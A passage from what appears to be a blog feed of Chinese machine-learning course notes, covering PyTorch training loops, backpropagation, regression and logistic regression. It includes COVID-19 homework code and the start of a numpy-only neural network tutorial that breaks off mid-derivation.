    x, y = x.to(device), y.to(device) # 将数据放入设备(CPU/Cuda)
    pred = model(x) # 前向传播(得到输出值)
    loss = criterion(pred, y) # 计算 loss
    loss.backward() # 计算梯度(backpropagation)
    optimizer.step() # 优化参数
    Neural Network Validation Loop

    上接上面的 epoch 循环:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    model.eval()  # 将模型设为 evaluation 模式
    total_loss = 0 # 初始化 loss
    for x, y in dv_set: # 从 dataloader 中读入 x, y
    x, y = x.to(device), y.to(device) # 将数据放入设备(CPU/Cuda)
    with torch.no_grad(): # 禁用梯度计算
    pred = model(x) # 计算输出值 pred
    loss = criterion(pred, y) # 计算 loss
    total_loss += loss.cpu().item() * len(x) # 将所有 loss 加到一起
    avg_loss = total_loss / len(dv_set.dataset) # 计算平均 loss
    Neural Network Testing Loop
    1
    2
    3
    4
    5
    6
    7
    model.eval()  # 将模型设为 evaluation 模式
    preds = [] # 定义一个列表存储预测值
    for x in tt_set: # 从 dataloader 中读入 x
    x = x.to(device) # 将数据放入设备(CPU/Cuda)
    with torch.no_grad(): # 禁用梯度计算
    pred = model(x) # 计算输出值 pred,即预测结果
    preds.append(pred.cpu()) # 生成预测结果
    Notice - model.eval(), torch.no_grad()
    • model.eval() 改变一些模型层的行为,如 dropout 和 batch normalization。
    • with torch.no_grad()防止计算结果被添加到梯度计算的图。通常用于防止在验证/测试数据上的意外训练。
    存/读 训练模型
    • Save
    1
    torch.save(model.state_dict(), path)
    • Load
    1
    2
    ckpt = torch.load(path)  # 保存文件路径
    model.load_state_dict(ckpt) # 保存 ckpt 文件

    More About PyTorch

    • torchaudio
      • speech/audio processing
    • torchtext
    • natural language processing
    • torchvision
      • computer vision
    • skorch
      • scikit-learn + pyTorch
    • Useful github repositories using PyTorch
      • Huggingface Transformers (transformer models: BERT, GPT, …)
      • Fairseq (sequence modeling for NLP & speech)
      • ESPnet (speech recognition, translation, synthesis, …)
      • Most implementations of recent deep learning papers

    Extra Material

    Introduction of Deep Learning

    png

    Deep Learning 使用次数越来越频繁。

    png

    Deep Learning 的历史:

    • 1958: Perceptron (linear model) 线性感知机
    • 1969: Perceptron has limitation 线性感知机有明显的局限性,如不能处理异或问题
    • 1980s: Multi-layer perceptron 多层感知机
      • Do not have significant difference from DNN today 与当今深度神经网络并无明显差别
    • 1986: Backpropagation 反向传播
      • Usually more than 3hidden layers is not helpful 多余 3 层的隐藏层并没有明显效果
    • 1989: 1hidden layer is “good enough”, why deep? 1 层隐藏层即可,为什么要多层?
    • 2006: RBM initialization (breakthrough) 受限玻尔兹曼机(RBM)学习 - 知乎 (zhihu.com)
    • 2009: GPU 显卡加速神经网络的训练速度
    • 2011: Start to be popular in speech recognition 在语音识别中效果显著
    • 2012: win ILSVRC image competition 赢得 ILSVRS 图像识别比赛

    png

    Deep Learning 的步骤与传统机器学习方法类似:

    • Step 1:define a setof function 在 Deep Learning 中为设置神经网络的结构
    • Step 2:goodness offunction
    • Step 3: pickthe bestfunction

    png

    png

    在神经网络前向传播的过程中其实就是一系列矩阵运算,因此使用 GPU 速度比 CPU 要更快。

    png

    神经网络的隐藏层就相当于传统机器学习方法中 Feature extractor replacingfeature engineering 的过程。

    如果是一个分类问题,在输出层要进行 Softmax 操作,输出期望值最高的类别。

    png

    对于手写体数字识别,输出的是一个向量,值最高的就是输出的类别。

    png

    此时神经网络中的隐藏层就是一个手写体数字识别函数集。你设定一个好的神经网络结构,以拟合出一个好的函数。

    png

    Q: 设置神经网络需要多少层?每层需要多少神经元?

    A: 需要开发者的不断试错和直觉。

    Q: 我们可以让机器来自动设计神经网络吗?

    A: 如 [Evolutionary Artificial Neural Networks (researchgate.net)](https://www.researchgate.net/publication/2861461_Evolutionary_Artificial_Neural_Networks#:~:text=Evolutionary artificial neural networks (EANNs) refer to a,(GAs)%2C evolutionary programming (EP)%2C or other evolutionary algorithms.),但是没有那么通用

    Q: 其他形状的神经网络结构?

    A: 如卷积神经网络

    png

    定义损失函数,由于 $y$ 和 $\hat y$ 都是概率分布,使用交叉熵损失函数(Cross-entropy)

    $$C(y,\hat y)=-\sum^{10}_{i=1}\hat{y_i}\ln y_i$$

    png

    最终的损失函数表示为 $L=\sumN_{n=1}Cn$,目标就是通过调整隐藏层中的参数使 $L$ 取得最小值。

    png

    搜索 $L$ 的最小值的方法:梯度下降。

    就连 Alpha Go 也使用梯度下降。

    png

    反向传播:计算各种微分的有效方式。人工计算微分总是很麻烦,往往使用现成的库。

    png

    理论:只要神经元个数够多,总能拟合出任意函数。

    png

    其他资源:

    Backpropagation

    png

    backpropagation 反向传播算法是在梯度下降算法中计算梯度一种有效率的算法。

    png

    链式法则

    • Case 1 $y=g(x)\ z=h(y)$
      • $\Delta x \rightarrow \Delta y \rightarrow \Delta z$
      • 要求 $z$ 对 $x$ 的导数:$\frac{dz}{dx}=\frac{dz}{dy}\frac{dy}{dx}$
    • Case 2 $x=g(s)\ y=h(s)\ z=k(x,y)$
      • 要求 $z$ 对 $s$ 的导数:$\frac{dz}{ds}=\frac{\partial z}{\partial x}\frac{dx}{ds}+\frac{\partial z}{\partial y}\frac{dy}{ds}$

    png

    对于梯度下降方法,需要求 $L$ 对各个神经元 $w$ 的权重:

    $$L(\theta)=\sumN_{n=1}Cn(\theta)\rightarrow \frac{\partial L(\theta)}{\partial w}=\sum^N_{n=1}\frac{\partial C^n(\theta)}{\partial w}$$

    要求 $\frac{\partial L(\theta)}{\partial w}$ 就要求 $\frac{\partial C}{\partial w}$。

    png

    根据链式法则,$\frac{\partial C}{\partial w}=\frac{\partial z}{\partial w}\frac{\partial C}{\partial z}$

    对于 Forward pass,用于计算 $\frac{\partial z}{\partial w}$,

    对于 Backward pass,用于计算 $\frac{\partial C}{\partial z}$,$z$ 是神经元的输出数据。

    png

    对于 Forward pass,如示意图,$z=x_1w_1+x_2w_2+b$,因此$\frac{\partial z}{\partial w_1}=x_1$,$\frac{\partial z}{\partial w_2}=x_2$,值就是输入进来的权重 $w$。

    png

    png

    而对于 Backward pass,用于计算 $\frac{\partial C}{\partial z}$根据链式法则,$\frac{\partial C}{\partial z}=\frac{\partial a}{\partial z}\frac{\partial C}{\partial a}=\frac{\partial z’}{\partial a}\frac{\partial C}{\partial z’}+\frac{\partial z’‘}{\partial a}\frac{\partial C}{\partial z’'}$

    $z$ 对上一个神经元经过激活函数后的输出 $a$ 很好计算(就是其权重 $w$),难点是交叉熵损失函数 $C$ 对 $z$ 的导数。

    png

    此时就要通过神经元后面的数据来计算 $\frac{\partial C}{\partial z}=\sigma’(z)\left[w_3\frac{\partial C}{\partial z’}+w_4\frac{\partial C}{\partial z’'}\right]$

    其中 $\sigma’(z)$ 就是激活函数的导数,是一个常数,因为 $z$ 的值已经在 forward pass 中得到。

    对于 Sigmoid 函数 $f(x)=\frac{1}{1+e^{-x}}$,其导函数 $f’(x)=f(x)\left[1-f(x)\right]$

    png

    如果当前层的下一层是输出层,则可以根据输出的值计算 $\frac{\partial C}{\partial z’}$

    png

    如果不是,则要递归地计算下一层的 $\frac{\partial C}{\partial z}$,直到下一层为输出层。

    png

    png

    最后总结,通过 Forward Pass 计算得到 $\frac{\partial z}{\partial w}=a$,再通过 Backward Pass 计算得到 $\frac{\partial C}{\partial z}$,两者相乘就得到要求的 $\frac{\partial C}{\partial w}$。

    Predicting Pokémon CP

    这是一个回归问题的案例分析。

    png

    回归 Regression 可以

    • 预测股票

      • 输入股票曲线,输出明天的道琼指数
    • 自动驾驶

      • 输入周边环境,输出操纵方向盘
    • 商品推荐

      • 输入使用者和商品,输出购买可能性

    png

    课程的案例分析是:

    已知宝可梦的战力值 $x_{cp}$,类型 $x_s$,体力 $x_{hp}$,重量 $x_w$,身高 $x_h$,尝试推测进化后的宝可梦的 CP(战力)值 $y$

    Step 1: Model

    png

    先假定一个线性模型,进化后的战力值只与当前战力值相关,$y=b+wx_{cp}$。

    Step 2: Goodness of Function

    png

    训练集是 10 个宝可梦的数据,记作 $(x^1,\hat y^1), (x^2, \hat y2)…(x10, \hat y^{10})$。

    png

    设计损失函数估算误差 Estimation error:$\mathrm{L}(f)=\mathrm{L}(w, b)=\sum^{10}{n=1}\left(\hat y^n - (b+w\cdot x^n{cp})\right)$

    Step 3: Gradient Descent

    png

    使用梯度下降方法以解决 $w^*=arg\min_wL(w)$

    png

    梯度下降只能找到极小值而不能保证找到最小值,在初始参数不同的时候可能会得到不同的结果。

    但在线性模型中,这个问题不存在,因为此时极小值就是最小值。

    png

    此时得到的训练模型 $b=-188.4, w=2.7$,在训练集中 $L=35.0$,在测试集中 $L=31.9$

    png

    考虑将模型换为更复杂的模型,此时 $L$ 值有所下降。

    Model Selection

    png

    选择的模型次数越高,模型在训练集上的 $L$ 值越小,但在测试集值中可能不降反增 $L$,这个现象称之为过拟合

    就好比你在驾校练车,练着练着发现了查看某些标记点开车效果更好,但在真实道路上并不能表现得更好。

    png

    考虑其他因素对 $y$ 的影响,如宝可梦本身的种族,不同的种族应用不同的线性模型。

    png

    引入独热编码,此时模型变为 $y=b+\sum w_ix_i$。

    png

    此法再次有效地降低了 $L$。

    png

    当模型过于复杂时,还是会出现过拟合的问题。

    png

    尝试修改 $L$ 的表达式,$L=\sum_n\left(\hat y^n-\left(b+\sum w_ix_i\right)\right)^2+{\color{Red}\lambda \sum(w_i)^2}$,这样当函数曲线变得不够平滑时,会得到一定的惩罚。

    png

    $\lambda$ 是一个超参数,太大太小都不好。We prefer smooth function, but don’t be too smooth.

    Pokemon classification

    Classification: Probabilistic Generative Model 分类:概率生成模型

    png

    分类问题:接受输入 $x$,输出分类的类别 $n$。

    实例:

    • Credit Scoring 信用评分
      • Input: income, savings, profession, age, past financial history…
      • Output: accept or refuse 借不借你钱
    • Medical Diagnosis 医疗诊断
      • Input: current symptoms, age, gender, past medical history …
      • Output: which kind of diseases 你得了啥病
    • Handwritten character recognition 手写体识别
      • Input: 手写图像
      • Output: 写的啥字

    png

    课程案例:根据宝可梦的种族值(血量、攻击、防御、特攻、特防、速度)预测这只宝可梦的属性。

    png

    如果强行把分类问题看作是一个回归问题:训练时把类别 1 当作输入为 1,把类别 2 当作输出为 -1

    测试时输出越接近 1,越认为是类别 1;输出越接近 -1,越认为是类别 2。

    png

    回归会将由于一些“太正确”的点而改变回归直线使得分类不正确。如果要分的类别更多则效果更差。

    png

    理想的替代:

    • 函数模型
      • $x$ 在 $f(x)$ 中,如果 $g(x)>0$,则认为是类别 1,否则是类别 2
    • 损失函数
      • $L(f)=\sum_n\delta(f(x^n)\ne \hat y^n)$,得到错误分类数据的次数
    • 找到一个方法使得 $L$ 最小
      • 例子:感知机,SVM

    png

    使用概率模型:

    $$P(x)=P(x|C_1)P(C_1)+P(x|C_2)P(C_2)$$

    png

    我们把序号 $< 400$ 的宝可梦当作训练集,其余当作测试集。

    序号 $< 400$ 的宝可梦中有 $79$ 只水系,$61$ 只普通系,因此 $P(C_1)=79/(79+61)=0.56, P(C_2)=61/(79+61)=0.44$

    png

    我们先假设宝可梦的种族只与宝可梦的防御和特防有关。

    如可达鸭的防御为 48,特防为 50,则它的特征向量为 $\begin{bmatrix} 48 \ 50 \end{bmatrix}$。

    我们假设水系宝可梦的防御和特防服从正态分布。

    png

    正态分布函数:

    $$f_{\mu,\Sigma}(x)=\frac{1}{(2\pi){D/2}}\frac{1}{|\Sigma|{1/2}}\exp{-\frac{1}{2}(x-\mu)T\Sigma{-1}(x-\mu)}$$

    • Input: vector $x$
    • output:
      • probability of sampling 采样概率 $x$
      • The shape of the function determines by mean 均值 $\mu$ and covariance matrix 协方差矩阵 $\Sigma$ 函数的图像由均值和协方差矩阵决定。

    png

    假设这些点是从高斯分布中取样的。
    找到它们背后的高斯分布。

    png

    最大似然估计法

    具有任何均值 $\mu$ 和协方差矩阵 $\Sigma$ 的高斯分布可以生成这些点

    当给定样本 $x1,x2,x3,…,x{79}$ 时,$\mu$ 和 $\Sigma$ 取得对应值的概率

    评估函数:

    $$L(\mu,\Sigma)=f_{\mu,\Sigma}(x1)f_{\mu,\Sigma}(x2)f_{\mu,\Sigma}(x3)…f_{\mu,\Sigma}(x{79})$$

    png

    为了让 $L$ 最小,$\mu$ 取样本的均值,$\Sigma$ 取样本的协方差。

    png

    此时计算两个属性的宝可梦样本的 $\mu$ 和 $\Sigma$。

    png

    在公式的参数都可求后,我们便可以进行分类。

    当 $P(C_1|x)>0.5$ 时,我们便认为样本 $x$ 属于类别 1。

    png

    然而这效果并不好…即使把所有因素都考虑进去,也只有 54% 的准确率。

    png

    开始调整模型,假设两个分类的协方差矩阵相同。

    png

    此时两种属性共用 $\Sigma = \frac{79}{140}\Sigma1+\frac{61}{140}\Sigma2$

    png

    此时分类边界又变成了直线,虽然与回归直线完全不同,但我们也把它称之为线性模型。

    将所有因素考虑进来,准确率提升至 73%。

    png

    总结 3 个步骤:

    • 建立模型
    • 评价函数好坏
    • 找到一个最好的函数

    png

    如果你假定所有分布都是独立的,则说明你在使用朴素贝叶斯分类器

    而对于二分类问题,你不要使用高斯分布,而是使用伯努利分布。

    png

    分析为什么边界是一条直线?

    将 $P(C_1|x)$ 推演成用 Sigmoid 函数来表示的形式 $P(C_1|x)=\sigma(z)$

    png

    png

    png

    一阵推演,$z$ 可以用一个线性式表示。

    $P(C_1|x)=\sigma(w\cdot x + b)$,将 $\Sigma$ 共用的时候,class 1 和 class 2 的 boundary 是线性的。

    我们可以直接找到 $w$ 和 $b$ 以求得边界而绕开计算 $N_1,N_2,\mu1,\mu2,\Sigma$ 吗?且听下回分解。

    Logistic Regression

    png

    由上节课得到选取的函数模型 $f_{w,b}(x)=P_{w,b}(C_1|x)$

    png

    $$f_{w,b}(x)=\sigma(z),z=\sum_iw_ix_i$$

    png

    定义评估函数

    $$L(w,b)=f_{w,b}(x1)f_{w,b}(x2)\left(1-f_{w,b}(x3)\right)…f_{w,b}(xN)$$

    目标是选取 $w*,b*$,使得 $L$ 最大。

    png

    将分类的类别用 $\hat y^n$ 表示,1 表示类别 1,0 表示类别 2。

    将问题由查找 $arg\max_{w,b}L(w,b)$ 转为 $arg\min_{w,b}-\ln L(x,b)$

    png

    最后得到由伯努利分布的交叉熵损失函数表示 $-\ln L(w,b)$。

    png

    为什么在 Logistics Regression 中,不像 Linear Regression 一样使用 square error?

    png

    查找一个最好的函数:求出 $-\ln L(w,b)$ 的最小值。

    依旧使用梯度下降方法。

    png

    png

    最后得到的方法与 Linear Regression 一样。

    总结:

    StepLogistic RegressionLinear Regression
    1 定义模型$f_{w,b}(x)=\sigma\left(\sum_iw_ix_i+b\right)$,值域 $[0,1]$$f_{w,b}(x)-\sum_iw_ix_i+b$,输出可以是任意值
    2 衡量模型好坏对于训练集:$(x^n,\hat y^n)$
    对于 $\hat y^n$:1 表示类别 1,0 表示类别 2
    损失函数:$L(f)=\sum_n C(f(x^n),\hat y^n)$,交叉熵损失函数
    对于训练集:$(x^n,\hat y^n)$
    对于 $\hat y^n$:真实值
    损失函数:$L(f)=\frac{1}{2}\sum_n (f(x^n)-\hat yn)2$,MSE
    3 查找最佳模型两者相同两者相同

    png

    当 Logistic Regression 使用 Square Error 作为损失函数?

    出现微分值为 0 的情况,导致参数无法迭代更新。

    png

    Cross Entropy 与 Square Error 的对比,Square Error 的梯度在 Logistics Regression 中太平缓,不利于训练。

    png

    对于 $P(C_1|x)=\sigma(w\cdot x + b)$:

    Discriminative 判别模型直接查找 $w$ 和 $b$

    Generative 概率模型需要计算样本的 $\mu1,\mu2,\Sigma^{-1}$

    两者选取的模型相同,但是最终得到的函数往往不同。

    png

    同样的模型,同样的训练数据,采用两种方法所得结果 $(w,b)$ 不同。因为生成模型对概率分布事先做了假设。所以一般来说,Discriminative model 会比 Generative model 表现更好。

    png

    对于如图上的训练集,给出测试集 $\begin{bmatrix}1\1\end{bmatrix}$,使用朴素贝叶斯分类器得到的结果是类别 2,这与直觉相悖。

    png

    • Benefit of generative model 概率模型的优点
      • With the assumption of probability distribution,less training data is needed
        • 在概率分布的假设下,需要的训练数据较少。
      • With the assumption of probability distributionmore robust to the noise
        • 在概率分布的假设下,对噪声更加稳健。
      • Priors and class-dependent probabilities can beestimated from different sources.
        • 可以从不同的来源估算出优先权和依赖类的概率。

    png

    png

    对于更多类别,使用 Softmax 操作得到概率分布。

    Softmax 的公式得到了数学证明。

    png

    Logistic Regression 的局限性——难以解决异或问题。

    png

    因为你无法找到一个直线划分它们。

    png

    解决方法:特征转移。如将 $x1’$: 点到 $\begin{bmatrix}0\0\end{bmatrix}$ 的距离,$x2’$: 点到 $\begin{bmatrix}1\1\end{bmatrix}$ 的距离,此时经过转换后的数据便可以用一条直线划分。

    但是找到这种特征转移函数并不是件易事。

    png

    通过在分类感知器前面再加上一些神经元以便特征转移。

    png

    此时便找到了一个方法使用 Logistic Regression 解决异或问题。

    png

    我们把这种方法总结起来就是个神经网络,也可以叫它 Deep Learning。

    HW1

    Download data

    https://www.kaggle.com/competitions/ml2022spring-hw1 获取数据集 covid.train.csvcovid.test.csv

    Import packages

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    # 数值运算
    import math
    import numpy as np
    # 读写数据
    import pandas as pd
    import os
    import csv
    # 进度条
    from tqdm import tqdm
    # Pytorch
    import torch
    import torch.nn as nn
    from torch.utils.data import Dataset, DataLoader, random_split
    # 绘制学习曲线
    from torch.utils.tensorboard import SummaryWriter

    Some Utility Functions

    You do not need to modify this part.

def same_seed(seed):
    """Fixes random number generator seeds for reproducibility."""
    torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False
    np.random.seed(seed)
    torch.manual_seed(seed)
    if torch.cuda.is_available():
        torch.cuda.manual_seed_all(seed)


def train_valid_split(data_set, valid_ratio, seed):
    """Split the provided training data into a training set and a
    validation set, returned as numpy arrays."""
    valid_set_size = int(valid_ratio * len(data_set))
    train_set_size = len(data_set) - valid_set_size
    train_set, valid_set = random_split(data_set,
                                        [train_set_size, valid_set_size],
                                        generator=torch.Generator().manual_seed(seed))
    return np.array(train_set), np.array(valid_set)


def predict(test_loader, model, device):
    model.eval()  # Set your model to evaluation mode.
    preds = []
    for x in tqdm(test_loader):
        x = x.to(device)
        with torch.no_grad():
            pred = model(x)
            preds.append(pred.detach().cpu())
    preds = torch.cat(preds, dim=0).numpy()
    return preds

    Dataset

class COVID19Dataset(Dataset):
    """
    x: features
    y: targets; if None, the dataset is used for prediction
    """
    def __init__(self, x, y=None):
        if y is None:
            self.y = y
        else:
            self.y = torch.FloatTensor(y)  # convert from np.array to a torch tensor
        self.x = torch.FloatTensor(x)

    def __getitem__(self, idx):
        """Return one sample by index."""
        if self.y is None:
            return self.x[idx]
        else:
            return self.x[idx], self.y[idx]

    def __len__(self):
        return len(self.x)

    Neural Network Model

Try different model architectures by modifying the class below.

class My_Model(nn.Module):
    def __init__(self, input_dim):
        super(My_Model, self).__init__()  # call the __init__ of the parent class nn.Module
        # TODO: modify the model structure; mind the dimensions.
        # self.layers defines the network architecture
        self.layers = nn.Sequential(
            nn.Linear(input_dim, 16),
            nn.ReLU(),         # activation function: ReLU
            nn.Linear(16, 8),  # 16 input features, 8 output features
            nn.ReLU(),
            nn.Linear(8, 1)    # 8 input features, 1 output feature (regression)
        )

    def forward(self, x):
        x = self.layers(x)
        x = x.squeeze(1)  # squeeze the output: (B, 1) -> (B)
        return x

    Feature Selection

Select the features you consider useful by modifying the function below.

def select_feat(train_data, valid_data, test_data, select_all=True):
    """Select useful features for the regression."""
    y_train, y_valid = train_data[:, -1], valid_data[:, -1]
    raw_x_train, raw_x_valid, raw_x_test = train_data[:, :-1], valid_data[:, :-1], test_data

    if select_all:
        feat_idx = list(range(raw_x_train.shape[1]))
    else:
        feat_idx = [0, 1, 2, 3, 4]  # TODO: select suitable feature columns

    return raw_x_train[:, feat_idx], raw_x_valid[:, feat_idx], raw_x_test[:, feat_idx], \
        y_train, y_valid

    Training Loop

def trainer(train_loader, valid_loader, model, config, device):
    # Define the loss function
    criterion = nn.MSELoss(reduction='mean')
    # Define the optimizer
    # TODO: check https://pytorch.org/docs/stable/optim.html for more algorithms
    # TODO: L2 regularization, or implement it yourself (see the sketch after this function)
    optimizer = torch.optim.SGD(model.parameters(), lr=config['learning_rate'], momentum=0.9)

    writer = SummaryWriter()  # tensorboard visualization

    if not os.path.isdir('./models'):
        os.mkdir('./models')  # create a directory to save models in

    n_epochs, best_loss, step, early_stop_count = config['n_epochs'], math.inf, 0, 0

    for epoch in range(n_epochs):
        model.train()  # set your model to training mode
        loss_record = []

        # tqdm visualizes the training progress
        train_pbar = tqdm(train_loader, position=0, leave=True)

        for x, y in train_pbar:
            optimizer.zero_grad()              # reset gradients to zero
            x, y = x.to(device), y.to(device)  # move the data to the device
            pred = model(x)
            loss = criterion(pred, y)
            loss.backward()                    # compute gradients (backpropagation)
            optimizer.step()                   # update the parameters
            step += 1
            loss_record.append(loss.detach().item())

            # show the current epoch number and loss on the progress bar
            train_pbar.set_description(f'Epoch [{epoch+1} / {n_epochs}]')
            train_pbar.set_postfix({'loss': loss.detach().item()})

        mean_train_loss = sum(loss_record) / len(loss_record)
        writer.add_scalar('Loss/train', mean_train_loss, step)

        model.eval()  # set your model to evaluation mode
        loss_record = []
        for x, y in valid_loader:
            x, y = x.to(device), y.to(device)
            with torch.no_grad():
                pred = model(x)
                loss = criterion(pred, y)

            loss_record.append(loss.item())

        mean_valid_loss = sum(loss_record) / len(loss_record)
        print(f'Epoch [{epoch + 1} / {n_epochs}]: '
              f'Train loss: {mean_train_loss:.4f}, Valid loss: {mean_valid_loss:.4f}')
        writer.add_scalar('Loss/valid', mean_valid_loss, step)

        if mean_valid_loss < best_loss:
            best_loss = mean_valid_loss
            torch.save(model.state_dict(), config['save_path'])  # save your best model
            print('Saving model with loss {:.3f}...'.format(best_loss))
            early_stop_count = 0
        else:
            early_stop_count += 1

        if early_stop_count >= config['early_stop']:
            # the model is not improving, so we stop training
            print('\nModel is not improving, so we halt the training session.')
            return
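For the L2-regularization TODO above, one minimal option (an illustration, not part of the original assignment code) is the weight_decay argument of the built-in optimizer, which adds an L2 penalty on the parameters:

# L2 regularization via weight decay; 1e-4 is a placeholder value, not tuned
optimizer = torch.optim.SGD(model.parameters(),
                            lr=config['learning_rate'],
                            momentum=0.9,
                            weight_decay=1e-4)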

Configurations

config contains the hyperparameters and the model save path.

device = 'cuda' if torch.cuda.is_available() else 'cpu'
config = {
    'seed': 5201314,        # random seed
    'select_all': True,     # whether to use all features
    'valid_ratio': 0.2,     # validation set size = training set size * valid_ratio
    'n_epochs': 3000,       # number of epochs
    'batch_size': 256,      # batch size
    'learning_rate': 1e-5,  # learning rate
    'early_stop': 400,      # stop if the model shows no improvement for this many epochs
    'save_path': './models/model.ckpt'  # model save path
}

    Dataloader

    Read data from files and set up training, validation, and testing sets. You do not need to modify this part.

# Set seed for reproducibility
same_seed(config['seed'])

# train_data size: 2699 x 118 (id + 37 states + 16 features x 5 days)
# test_data size: 1078 x 117 (without last day's positive rate)
train_data, test_data = pd.read_csv('./covid.train.csv').values, \
    pd.read_csv('./covid.test.csv').values
train_data, valid_data = train_valid_split(train_data,
                                           config['valid_ratio'],
                                           config['seed'])

# Print out the data size.
print(f"""train_data size: {train_data.shape}
valid_data size: {valid_data.shape}
test_data size: {test_data.shape}""")

# Select features
x_train, x_valid, x_test, y_train, y_valid = select_feat(train_data,
                                                         valid_data,
                                                         test_data,
                                                         config['select_all'])

# Print out the number of features.
print(f'number of features: {x_train.shape[1]}')

train_dataset, valid_dataset, test_dataset = COVID19Dataset(x_train, y_train), \
    COVID19Dataset(x_valid, y_valid), \
    COVID19Dataset(x_test)

# The PyTorch data loaders load the datasets in batches.
train_loader = DataLoader(train_dataset, batch_size=config['batch_size'],
                          shuffle=True, pin_memory=True)
valid_loader = DataLoader(valid_dataset, batch_size=config['batch_size'],
                          shuffle=True, pin_memory=True)
test_loader = DataLoader(test_dataset, batch_size=config['batch_size'],
                         shuffle=False, pin_memory=True)
train_data size: (2160, 118)
valid_data size: (539, 118)
test_data size: (1078, 117)
number of features: 117

    Start training!

# Put your model and data on the same computation device.
    model = My_Model(input_dim=x_train.shape[1]).to(device)
    trainer(train_loader, valid_loader, model, config, device)

    Plot learning curves with tensorboard (optional)

Visualize the training results.

    tensorboard is a tool that allows you to visualize your training progress.

If this block does not display your learning curve, please wait a few minutes and re-run this block. It might take some time to load your logging information.

    %reload_ext tensorboard
    %tensorboard --logdir=./runs/

This displays tensorboard inside the Jupyter Notebook.

    Testing

The predictions of your model on the testing set will be stored in pred.csv.

def save_pred(preds, file):
    ''' Save predictions to specified file '''
    with open(file, 'w') as fp:
        writer = csv.writer(fp)
        writer.writerow(['id', 'tested_positive'])
        for i, p in enumerate(preds):
            writer.writerow([i, p])

model = My_Model(input_dim=x_train.shape[1]).to(device)
model.load_state_dict(torch.load(config['save_path']))
preds = predict(test_loader, model, device)
save_pred(preds, 'pred.csv')
    100%|██████████| 5/5 [00:00<00:00, 500.02it/s]
    ]]>
@@ -8554,7 +8554,7 @@ /posts/Python-Building%20a%20neural%20network%20FROM%20SCRATCH%20(no%20Tensorflow%20or%20Pytorch,%20just%20numpy%20&%20math)/ - Preface

A walkthrough of building a neural network using only numpy and math, rather than Tensorflow or Pytorch.

Related resources

Contents

Import the libraries

    import numpy as np
    import pandas as pd
    from matplotlib import pyplot as plt

Read the dataset

    data = pd.read_csv('kaggle/input/digit-recognizer/train.csv')
    data.shape
    (42000, 785)

Array shape: $(42000, 785)$, meaning:

• $42000$ rows: the dataset contains $42000$ images

• $785$ columns: each image is $28 \times 28$ pixels plus $1$ label, and $28 \times 28 + 1 = 785$

Split the dataset into a training set and a validation set

data = np.array(data)  # convert the dataset from a pd.DataFrame to an np.array
m, n = data.shape
np.random.shuffle(data)  # shuffle operates on the array in place and returns None

# validation set
data_dev = data[0:1000].T  # the first 1000 samples
Y_dev = data_dev[0]
X_dev = data_dev[1:n]
X_dev = X_dev / 255.  # map the pixel grayscale values to floats in [0, 1] so the later exp calls do not overflow

# training set
data_train = data[1000:m].T
Y_train = data_train[0]
X_train = data_train[1:n]
X_train = X_train / 255.
_, m_train = X_train.shape

Define the functions

    ​ Our NN will have a simple two-layer architecture. Input layer $a^{[0]}$ will have $784$ units corresponding to the $784$ pixels in each $28\times 28$ input image. A hidden layer $a^{[1]}$ will have $10$ units with ReLU activation, and finally our output layer $a^{[2]}$ will have $10$ units corresponding to the ten digit classes with softmax activation.


    Vars and shapes

    png

    Forward prop

    • $A^{[0]} = X$: 784 x m
    • $Z^{[1]} \sim A^{[1]}$: 10 x m
    • $W^{[1]}$: 10 x 784 (as $W^{[1]} A^{[0]} \sim Z^{[1]}$)
    • $B^{[1]}$: 10 x 1
    • $Z^{[2]} \sim A^{[2]}$: 10 x m
• $W^{[2]}$: 10 x 10 (as $W^{[2]} A^{[1]} \sim Z^{[2]}$)
    • $B^{[2]}$: 10 x 1

    Backprop

    • $dZ^{[2]}$: 10 x m ($~A^{[2]}$)
    • $dW^{[2]}$: 10 x 10
    • $dB^{[2]}$: 10 x 1
    • $dZ^{[1]}$: 10 x m ($~A^{[1]}$)
    • $dW^{[1]}$: 10 x 10
    • $dB^{[1]}$: 10 x 1

Initialize the parameters

Initialize the parameters uniformly at random in [-0.5, 0.5).

np.random.rand() returns one or more samples drawn uniformly from [0, 1), excluding 1.

def init_params():
    W1 = np.random.rand(10, 784) - 0.5
    b1 = np.random.rand(10, 1) - 0.5
    W2 = np.random.rand(10, 10) - 0.5
    b2 = np.random.rand(10, 1) - 0.5
    return W1, b1, W2, b2

Activation function: ReLU

def ReLU(Z):
    return np.maximum(Z, 0)

    Softmax

The Softmax function maps each output node's value into [0, 1] and constrains the outputs to sum to 1.

$\mathrm{Softmax}(z_i)=\frac{e^{z_i}}{\sum_{c=1}^{C}e^{z_c}}$, where $z_i$ is the output of node $i$ and $C$ is the number of output nodes, i.e. the number of classes. Softmax thus turns the multi-class outputs into a probability distribution on [0, 1] that sums to 1.

    png

def softmax(Z):
    A = np.exp(Z) / sum(np.exp(Z))
    return A
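The earlier division by 255 keeps Z small enough for np.exp; a more defensive variant (my addition, not from the original post) subtracts the per-column maximum first:

def softmax_stable(Z):
    # shifting by the column-wise max leaves the output unchanged
    # but prevents np.exp from overflowing
    e = np.exp(Z - Z.max(axis=0, keepdims=True))
    return e / e.sum(axis=0, keepdims=True)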

Forward propagation

    $$Z^{[1]} = W^{[1]} X + b^{[1]}$$
$$A^{[1]} = g_{\text{ReLU}}(Z^{[1]})$$
    $$Z^{[2]} = W^{[2]} A^{[1]} + b^{[2]}$$
    $$A^{[2]} = g_{\text{softmax}}(Z^{[2]})$$

def forward_prop(W1, b1, W2, b2, X):
    Z1 = W1.dot(X) + b1
    A1 = ReLU(Z1)
    Z2 = W2.dot(A1) + b2
    A2 = softmax(Z2)
    return Z1, A1, Z2, A2

Derivative of ReLU, used in gradient descent

def ReLU_deriv(Z):
    return Z > 0  # boolean array: acts as 1 where Z > 0 and 0 elsewhere when multiplied

One-hot encoding

Convert the labels Y to one-hot encoding:

def one_hot(Y):
    one_hot_Y = np.zeros((Y.size, Y.max() + 1))
    one_hot_Y[np.arange(Y.size), Y] = 1
    one_hot_Y = one_hot_Y.T
    return one_hot_Y

Backpropagation

    $$dZ^{[2]} = A^{[2]} - Y$$
    $$dW^{[2]} = \frac{1}{m} dZ^{[2]} A^{[1]T}$$
    $$dB^{[2]} = \frac{1}{m} \Sigma {dZ^{[2]}}$$
    $$dZ^{[1]} = W^{[2]T} dZ^{[2]} .* g^{[1]\prime} (z^{[1]})$$
    $$dW^{[1]} = \frac{1}{m} dZ^{[1]} A^{[0]T}$$
